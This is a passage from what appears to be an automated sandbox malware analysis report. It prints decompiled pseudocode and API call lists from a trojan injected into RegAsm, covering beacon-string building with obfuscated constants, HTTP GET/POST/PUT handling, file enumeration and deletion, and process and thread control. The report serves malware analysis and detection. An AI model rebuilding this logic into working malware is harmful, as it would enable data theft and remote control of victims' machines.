				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x10aa018; // 0x6b01647b
				asm("bswap eax");
				_t65 =  *0x10aa014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x10aa010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x10aa00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0x10aa2d4; // 0x235d5a8
				_t3 = _t68 + 0x10ab622; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d16e, _t67, _t66, _t65, _t64,  *0x10aa02c,  *0x10aa004, _t63);
				_t71 = E010A415C();
				_t72 =  *0x10aa2d4; // 0x235d5a8
				_t4 = _t72 + 0x10ab662; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x10aa2d4; // 0x235d5a8
					_t8 = _t139 + 0x10ab66d; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E010A12E4(_t144);
				_t77 =  *0x10aa2d4; // 0x235d5a8
				_t10 = _t77 + 0x10ab38a; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x10aa2d4; // 0x235d5a8
				_t12 = _t81 + 0x10ab7b4; // 0x3408d5c
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x10ab33b; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x10aa31c; // 0x34095e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x10aa2d4; // 0x235d5a8
					_t18 = _t135 + 0x10ab8e9; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x10aa32c; // 0x34095b0
				if(_t86 != 0) {
					_t132 =  *0x10aa2d4; // 0x235d5a8
					_t20 = _t132 + 0x10ab685; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x10aa37c; // 0x3409630
				_t88 = E010A3770(0x10aa00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x10aa290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x10aa290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x10aa290, _t167, _v12);
						goto L28;
					}
					E010A530B(GetTickCount());
					_t95 =  *0x10aa37c; // 0x3409630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x10aa37c; // 0x3409630
					__imp__(_t99 + 0x40);
					_t101 =  *0x10aa37c; // 0x3409630
					_t163 = E010A277F(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x10aa290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x10a92ac);
					_push(_t163);
					_t107 = E010A347A();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x10aa290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E010A6803( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E010A315F();
						L24:
						HeapFree( *0x10aa290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E010A7655(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E010A32E4(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E010A2625(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E010A173D(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E010A2625(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x010a1d10
0x010a1d10
0x010a1d10
0x010a1d19
0x010a1d1e
0x010a1d25
0x010a1d27
0x010a1d27
0x010a1d34
0x010a1d3f
0x010a1d42
0x010a1d4d
0x010a1d50
0x010a1d55
0x010a1d58
0x010a1d5d
0x010a1d60
0x010a1d6c
0x010a1d79
0x010a1d7b
0x010a1d81
0x010a1d86
0x010a1d91
0x010a1d93
0x010a1d96
0x010a1d9c
0x010a1d9e
0x010a1da6
0x010a1db1
0x010a1db3
0x010a1db6
0x010a1db6
0x010a1db8
0x010a1dbf
0x010a1dc4
0x010a1dd1
0x010a1dd3
0x010a1dd8
0x010a1de0
0x010a1de3
0x010a1de9
0x010a1df4
0x010a1df6
0x010a1dfb
0x010a1e00
0x010a1e03
0x010a1e08
0x010a1e13
0x010a1e15
0x010a1e18
0x010a1e18
0x010a1e1a
0x010a1e21
0x010a1e24
0x010a1e29
0x010a1e33
0x010a1e35
0x010a1e35
0x010a1e38
0x010a1e46
0x010a1e4b
0x010a1e4f
0x010a1e52
0x010a201c
0x010a2024
0x010a2031
0x010a1e58
0x010a1e64
0x010a1e6c
0x010a1e6f
0x010a200c
0x010a2016
0x00000000
0x010a2016
0x010a1e7b
0x010a1e80
0x010a1e89
0x010a1e9a
0x010a1e9e
0x010a1ea7
0x010a1ead
0x010a1eba
0x010a1ec1
0x010a1eca
0x010a1ed0
0x010a1ffc
0x010a2006
0x00000000
0x010a2006
0x010a1edc
0x010a1ee2
0x010a1ee3
0x010a1eea
0x010a1eed
0x010a1fee
0x010a1ff6
0x00000000
0x010a1ff6
0x010a1ef6
0x010a1efc
0x010a1f05
0x010a1f0e
0x010a1f19
0x010a1f20
0x010a1f23
0x010a2034
0x010a1fd6
0x010a1fd6
0x010a1fdb
0x010a1fe6
0x010a1fec
0x00000000
0x010a1fec
0x010a1f2d
0x010a1f34
0x010a1f37
0x010a1f3c
0x010a1f4c
0x010a1f4f
0x010a1f55
0x010a1f5b
0x010a1f61
0x010a1f64
0x010a1f6a
0x010a1f6d
0x010a1f72
0x010a1f76
0x010a1f76
0x010a1f82
0x010a1f8e
0x010a1f92
0x010a1f94
0x010a1f99
0x010a1f9b
0x010a1fa0
0x010a1fa5
0x010a1fb2
0x010a1fba
0x010a1fbd
0x010a1fbd
0x010a1f99
0x00000000
0x010a1f84
0x010a1f88
0x010a1fbf
0x010a1fc2
0x010a1fcb
0x00000000
0x00000000
0x00000000
0x00000000
0x010a1fcb
0x010a1f8a
0x00000000
0x010a1f8a
0x010a1f82

APIs

GetTickCount.KERNEL32 ref: 010A1D27
wsprintfA.USER32 ref: 010A1D74
wsprintfA.USER32 ref: 010A1D91
wsprintfA.USER32 ref: 010A1DB1
wsprintfA.USER32 ref: 010A1DCF
wsprintfA.USER32 ref: 010A1DF2
wsprintfA.USER32 ref: 010A1E13
wsprintfA.USER32 ref: 010A1E33
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010A1E64
GetTickCount.KERNEL32 ref: 010A1E75
RtlEnterCriticalSection.NTDLL(034095F0), ref: 010A1E89
RtlLeaveCriticalSection.NTDLL(034095F0), ref: 010A1EA7

Part of subcall function 010A277F: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A27AA
Part of subcall function 010A277F: lstrlen.KERNEL32(00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A27B2
Part of subcall function 010A277F: strcpy.NTDLL ref: 010A27C9
Part of subcall function 010A277F: lstrcat.KERNEL32(00000000,00000000), ref: 010A27D4
Part of subcall function 010A277F: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010A2E14,?,00000000,010A2E14,00000000,03409630), ref: 010A27F1

StrTrimA.SHLWAPI(00000000,010A92AC,?,03409630), ref: 010A1EDC

Part of subcall function 010A347A: lstrlen.KERNEL32(0340887A,00000000,00000000,00000000,010A2E3B,00000000), ref: 010A348A
Part of subcall function 010A347A: lstrlen.KERNEL32(?), ref: 010A3492
Part of subcall function 010A347A: lstrcpy.KERNEL32(00000000,0340887A), ref: 010A34A6
Part of subcall function 010A347A: lstrcat.KERNEL32(00000000,?), ref: 010A34B1

lstrcpy.KERNEL32(00000000,?), ref: 010A1EFC
lstrcat.KERNEL32(00000000,?), ref: 010A1F0E
lstrcat.KERNEL32(00000000,00000000), ref: 010A1F14

Part of subcall function 010A6803: lstrlen.KERNEL32(?,00000000,03409CD0,7691C740,010A3EDC,03409ED5,?,?,?,?,?,69B25F44,E8FA7DD7,00000000,010A59A5), ref: 010A680A
Part of subcall function 010A6803: mbstowcs.NTDLL ref: 010A6833
Part of subcall function 010A6803: memset.NTDLL ref: 010A6845

wcstombs.NTDLL ref: 010A1FA5

Part of subcall function 010A32E4: SysAllocString.OLEAUT32(00000000), ref: 010A3325

Part of subcall function 010A2625: RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

HeapFree.KERNEL32(00000000,?,00000000), ref: 010A1FE6
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010A1FF6
HeapFree.KERNEL32(00000000,00000000,?,03409630), ref: 010A2006
HeapFree.KERNEL32(00000000,?), ref: 010A2016
HeapFree.KERNEL32(00000000,?), ref: 010A2024

Strings

Ut, xrefs: 010A1FE6, 010A1FF6, 010A2006, 010A2016, 010A2024

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: Ut
API String ID: 972889839-8415677
Opcode ID: b0b084e9326aeb37fd4e958e5e930f9b8e50166d4d7697cf721762f98caf5bdc
Instruction ID: ff9e4e09233c97bc667c312f5264b3d2baf2fbc1cad4565bd2ee7cf9381a6f48
Opcode Fuzzy Hash: b0b084e9326aeb37fd4e958e5e930f9b8e50166d4d7697cf721762f98caf5bdc
Instruction Fuzzy Hash: 09A16971600519EFDB21DFA8DC88E9A3BE9FF48354F954021F988C7255DB3AD914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F057FC, Relevance: 39.3, APIs: 26, Instructions: 257memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 03F0581D
GetTickCount.KERNEL32 ref: 03F05837
wsprintfA.USER32 ref: 03F0588A
QueryPerformanceFrequency.KERNEL32(?), ref: 03F05896
QueryPerformanceCounter.KERNEL32(?), ref: 03F058A1
_aulldiv.NTDLL(?,?,?,?), ref: 03F058B7
wsprintfA.USER32 ref: 03F058CD
wsprintfA.USER32 ref: 03F058EB
wsprintfA.USER32 ref: 03F05902
wsprintfA.USER32 ref: 03F05923
wsprintfA.USER32 ref: 03F0595E
wsprintfA.USER32 ref: 03F05982
lstrcat.KERNEL32(?,?), ref: 03F059BA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03F059D4
GetTickCount.KERNEL32 ref: 03F059E4
RtlEnterCriticalSection.NTDLL(043AB148), ref: 03F059F8
RtlLeaveCriticalSection.NTDLL(043AB148), ref: 03F05A16
StrTrimA.SHLWAPI(00000000,03F263D8,00000000,043AB188), ref: 03F05A4B
lstrcpy.KERNEL32(00000000,00000000), ref: 03F05A6B
lstrcat.KERNEL32(00000000,?), ref: 03F05A76
lstrcat.KERNEL32(00000000,00000000), ref: 03F05A7A
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 03F05AFB
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03F05B0A
HeapFree.KERNEL32(00000000,00000000,00000000,043AB188), ref: 03F05B19
HeapFree.KERNEL32(00000000,00000000), ref: 03F05B2B
HeapFree.KERNEL32(00000000,?), ref: 03F05B3D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
String ID:
API String ID: 2878544442-0
Opcode ID: 3b4e29c7e83e880628f0eec1d9c348a1217f5890a32e8364c58a6651ec6f7d63
Instruction ID: 208dc3b1ed88d14ffb0410245d82e760bffdf4bb8a9c68783913ae6bfe1dd425
Opcode Fuzzy Hash: 3b4e29c7e83e880628f0eec1d9c348a1217f5890a32e8364c58a6651ec6f7d63
Instruction Fuzzy Hash: DBA18B7150420AEFCB21EFA8EC94E5A7BE8FB58304F140425F918D72A4DB74E855EF61

Uniqueness

Uniqueness Score: -1.00%

Function 03F0ECD6, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 390memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,03F2C140), ref: 03F0ED38
RtlAllocateHeap.NTDLL(00000000,03F2C091,?), ref: 03F0EDD4
lstrcpyn.KERNEL32(00000000,?,03F2C091,?,03F2C140), ref: 03F0EDE9
HeapFree.KERNEL32(00000000,00000000,00000000,?,03F2C140), ref: 03F0EE04
StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,03F2C090,?,?,03F2C140), ref: 03F0EEEE
StrChrA.SHLWAPI(00000001,00000020,?,03F2C140), ref: 03F0EEFF
lstrlen.KERNEL32(00000000,?,03F2C140), ref: 03F0EF13
memmove.NTDLL(03F2C091,?,00000001,?,03F2C140), ref: 03F0EF23
lstrlen.KERNEL32(?,?,00000000,00000000,?,03F2C090,?,?,03F2C140), ref: 03F0EF4F
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0EF75
memcpy.NTDLL(00000000,?,?,?,03F2C140), ref: 03F0EF89
memcpy.NTDLL(03F2C090,?,?,?,03F2C140), ref: 03F0EFA9
HeapFree.KERNEL32(00000000,03F2C090,?,?,?,?,?,?,?,?,03F2C140), ref: 03F0EFE5
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03F0F0AB
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 03F0F0F3

Strings

OPTI, xrefs: 03F0ED10
PUT , xrefs: 03F0ED02
OPTI, xrefs: 03F0EEE3
GET , xrefs: 03F0ECFB
POST, xrefs: 03F0ED09
GET , xrefs: 03F0EEDB

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: GET $GET $OPTI$OPTI$POST$PUT
API String ID: 3227826163-647159250
Opcode ID: 1b7ce1775141489a2298f73f3bebccf2ab3f3db11412a65ef2abf959e5a537f2
Instruction ID: 13a676421502446eee194c83b424f1d969c82440a7a28e8226e02901abf36bec
Opcode Fuzzy Hash: 1b7ce1775141489a2298f73f3bebccf2ab3f3db11412a65ef2abf959e5a537f2
Instruction Fuzzy Hash: 36E16C35A0060AEFDB24DFA8CC94AAABBB9FF14300F184559F925DB290D770E951EB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F03BC9, Relevance: 33.3, APIs: 22, Instructions: 276memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 03F03BFC
wsprintfA.USER32 ref: 03F03C61
wsprintfA.USER32 ref: 03F03CA7
wsprintfA.USER32 ref: 03F03CC8
lstrcat.KERNEL32(00000000,?), ref: 03F03CFF
wsprintfA.USER32 ref: 03F03D1B
wsprintfA.USER32 ref: 03F03D31
wsprintfA.USER32 ref: 03F03D51
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03F03D6E
RtlEnterCriticalSection.NTDLL(043AB148), ref: 03F03D8F
RtlLeaveCriticalSection.NTDLL(043AB148), ref: 03F03DA9

Part of subcall function 03F1EE2C: lstrlen.KERNEL32(00000000,74E481D0,?,00000000,00000000,?,?,03F05A2C,00000000,043AB188), ref: 03F1EE57
Part of subcall function 03F1EE2C: lstrlen.KERNEL32(?,?,?,03F05A2C,00000000,043AB188), ref: 03F1EE5F
Part of subcall function 03F1EE2C: strcpy.NTDLL ref: 03F1EE76
Part of subcall function 03F1EE2C: lstrcat.KERNEL32(00000000,?), ref: 03F1EE81
Part of subcall function 03F1EE2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03F05A2C,00000000,043AB188), ref: 03F1EE9E

StrTrimA.SHLWAPI(00000000,03F263D8,00000000,043AB188), ref: 03F03DDB

Part of subcall function 03F0BA42: lstrlen.KERNEL32(043A9986,00000000,74E481D0,00000000,03F05A57,00000000), ref: 03F0BA52
Part of subcall function 03F0BA42: lstrlen.KERNEL32(?), ref: 03F0BA5A
Part of subcall function 03F0BA42: lstrcpy.KERNEL32(00000000,043A9986), ref: 03F0BA6E
Part of subcall function 03F0BA42: lstrcat.KERNEL32(00000000,?), ref: 03F0BA79

lstrcpy.KERNEL32(?,00000000), ref: 03F03DFF
lstrcat.KERNEL32(?,?), ref: 03F03E0D
lstrcat.KERNEL32(?,00000000), ref: 03F03E14
RtlEnterCriticalSection.NTDLL(043AB148), ref: 03F03E1F
RtlLeaveCriticalSection.NTDLL(043AB148), ref: 03F03E3B

Part of subcall function 03F1AFF1: memcpy.NTDLL(?,03F0AAC3,00000010,?,?,?,?,?,?,?,?,?,?,03F12CF5,00000000,00000000), ref: 03F1B042
Part of subcall function 03F1AFF1: memcpy.NTDLL(00000000,00000000,03F0AAC3,0000011F), ref: 03F1B0D5

HeapFree.KERNEL32(00000000,?,00000001,043AB188,?,?,?), ref: 03F03F09
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03F03F18
HeapFree.KERNEL32(00000000,?,00000000,043AB188), ref: 03F03F2A
HeapFree.KERNEL32(00000000,00000000), ref: 03F03F3C
HeapFree.KERNEL32(00000000,00000000), ref: 03F03F4B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpymemcpy$strcpy
String ID:
API String ID: 2173832509-0
Opcode ID: 3fa092ff2b19228588a860b85f42eb542570cc80466601ee93dafa644065c110
Instruction ID: 70299279798c2761f239edf4824f7ec30fab79ea93f4a93356abe7341f7807c4
Opcode Fuzzy Hash: 3fa092ff2b19228588a860b85f42eb542570cc80466601ee93dafa644065c110
Instruction Fuzzy Hash: BFA19B7150430AEFCB21EFA8EC60E1ABBE8EB58304F19451AF958D72A4DB74E805DF51

Uniqueness

Uniqueness Score: -1.00%

Function 03F15DC3, Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 03F15DD8

Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 03F22F1B
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?,?,00000000), ref: 03F22F27
Part of subcall function 03F22ECF: memset.NTDLL ref: 03F22F6F
Part of subcall function 03F22ECF: FindFirstFileW.KERNEL32(00000000,00000000), ref: 03F22F8A
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(0000002C), ref: 03F22FC2
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?), ref: 03F22FCA
Part of subcall function 03F22ECF: memset.NTDLL ref: 03F22FED
Part of subcall function 03F22ECF: wcscpy.NTDLL ref: 03F22FFF

Part of subcall function 03F22ECF: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 03F23025
Part of subcall function 03F22ECF: RtlEnterCriticalSection.NTDLL(?), ref: 03F2305A
Part of subcall function 03F22ECF: RtlLeaveCriticalSection.NTDLL(?), ref: 03F23076
Part of subcall function 03F22ECF: FindNextFileW.KERNEL32(?,00000000), ref: 03F2308F
Part of subcall function 03F22ECF: WaitForSingleObject.KERNEL32(00000000), ref: 03F230A1
Part of subcall function 03F22ECF: FindClose.KERNEL32(?), ref: 03F230B6
Part of subcall function 03F22ECF: FindFirstFileW.KERNEL32(00000000,00000000), ref: 03F230CA
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(0000002C), ref: 03F230EC

RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 03F15E34
memcpy.NTDLL(00000000,?,00000000), ref: 03F15E47
lstrcpyW.KERNEL32(00000000,?), ref: 03F15E5E

Part of subcall function 03F22ECF: FindNextFileW.KERNEL32(?,00000000), ref: 03F23162
Part of subcall function 03F22ECF: WaitForSingleObject.KERNEL32(00000000), ref: 03F23174
Part of subcall function 03F22ECF: FindClose.KERNEL32(?), ref: 03F2318F

HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 03F15E89
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 03F15EA1
HeapFree.KERNEL32(00000000,00000000), ref: 03F15EFB
lstrlenW.KERNEL32(00000000,?), ref: 03F15F1E
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F15F30
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 03F15FA4
HeapFree.KERNEL32(00000000,?), ref: 03F15FB4

Part of subcall function 03F1182B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,03F136F0,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F1183A
Part of subcall function 03F1182B: mbstowcs.NTDLL ref: 03F11856

CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 03F15FDD
lstrlenW.KERNEL32(03F2D8B0,?), ref: 03F16057
DeleteFileW.KERNEL32(?,?), ref: 03F16085
HeapFree.KERNEL32(00000000,?), ref: 03F16093
HeapFree.KERNEL32(00000000,?), ref: 03F160B4

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
String ID:
API String ID: 72361108-0
Opcode ID: 5da17e0ae25c7dd7897d9d559a8d7b967fdf46dcbb1def75f0e45d480375586b
Instruction ID: 7714c0dff4ef33c90478dc8f94a7927828a0002ac30866157b7f459bcd3f9786
Opcode Fuzzy Hash: 5da17e0ae25c7dd7897d9d559a8d7b967fdf46dcbb1def75f0e45d480375586b
Instruction Fuzzy Hash: 9C91467190021EFFCB20EBA4EC98CAE7BBCFB19344B044511F919CB165D774A996DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F144B4, Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03F144D6
RtlEnterCriticalSection.NTDLL(00000000), ref: 03F144F3
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 03F14543
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 03F1454D
GetLastError.KERNEL32 ref: 03F14557
HeapFree.KERNEL32(00000000,00000000), ref: 03F14568
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 03F1458A
HeapFree.KERNEL32(00000000,?), ref: 03F145C1
RtlLeaveCriticalSection.NTDLL(00000000), ref: 03F145D5
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 03F145DE
SuspendThread.KERNEL32(?), ref: 03F145ED
CreateEventA.KERNEL32(03F2C1A8,00000001,00000000), ref: 03F14601
SetEvent.KERNEL32(00000000), ref: 03F1460E
CloseHandle.KERNEL32(00000000), ref: 03F14615
Sleep.KERNEL32(000001F4), ref: 03F14628
ResumeThread.KERNEL32(?), ref: 03F1464C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID:
API String ID: 1011176505-0
Opcode ID: 681805fca763d82ff580c0bb947107ddcae563ecd30f6b333046c376adfb9e35
Instruction ID: c15ee183bf4be8ad7117b67d35e94cba33d46e6c254d75c3134feeab416335b2
Opcode Fuzzy Hash: 681805fca763d82ff580c0bb947107ddcae563ecd30f6b333046c376adfb9e35
Instruction Fuzzy Hash: 7D415CB290010EEFCB20EFE5EC989ADBBB9FB54305B144169F501E2168DB719EA4DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F18ABB, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

memset.NTDLL ref: 03F18AE9
StrChrA.SHLWAPI(?,0000000D), ref: 03F18B2F
StrChrA.SHLWAPI(?,0000000A), ref: 03F18B3C
StrChrA.SHLWAPI(?,0000007C), ref: 03F18B63
StrTrimA.SHLWAPI(?,03F2847C), ref: 03F18B78
StrChrA.SHLWAPI(?,0000003D), ref: 03F18B81
StrTrimA.SHLWAPI(00000001,03F2847C), ref: 03F18B97
_strupr.NTDLL ref: 03F18B9E
StrTrimA.SHLWAPI(?,?), ref: 03F18BAB
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 03F18BF3
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?,00000001), ref: 03F18C12

Strings

;, xrefs: 03F18B51
, xrefs: 03F18BA3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: 4b3fb02ac555873c69b9e4e6c90203ab69dbec45f90f15826bc451109fe96d0b
Instruction ID: 5452f065d71c19a49e08fdb1f998423887ad6ad690d3b67fea09472014077307
Opcode Fuzzy Hash: 4b3fb02ac555873c69b9e4e6c90203ab69dbec45f90f15826bc451109fe96d0b
Instruction Fuzzy Hash: B841F471A0530A9FD720EF28AD44F2BFBE8AF58680F08081DF895DB241DB74D915CB62

Uniqueness

Uniqueness Score: -1.00%

Function 03F0612C, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F06141

Part of subcall function 03F1182B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,03F136F0,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F1183A
Part of subcall function 03F1182B: mbstowcs.NTDLL ref: 03F11856

lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 03F0617A
wcstombs.NTDLL ref: 03F06184
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 03F061B5
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03F06849), ref: 03F061E1
TerminateProcess.KERNEL32(?,000003E5), ref: 03F061F7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03F06849), ref: 03F0620B
GetLastError.KERNEL32 ref: 03F0620F
GetExitCodeProcess.KERNEL32(?,00000001), ref: 03F0622F
CloseHandle.KERNEL32(?), ref: 03F0623E
CloseHandle.KERNEL32(?), ref: 03F06243
GetLastError.KERNEL32 ref: 03F06247

Strings

D, xrefs: 03F06155

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

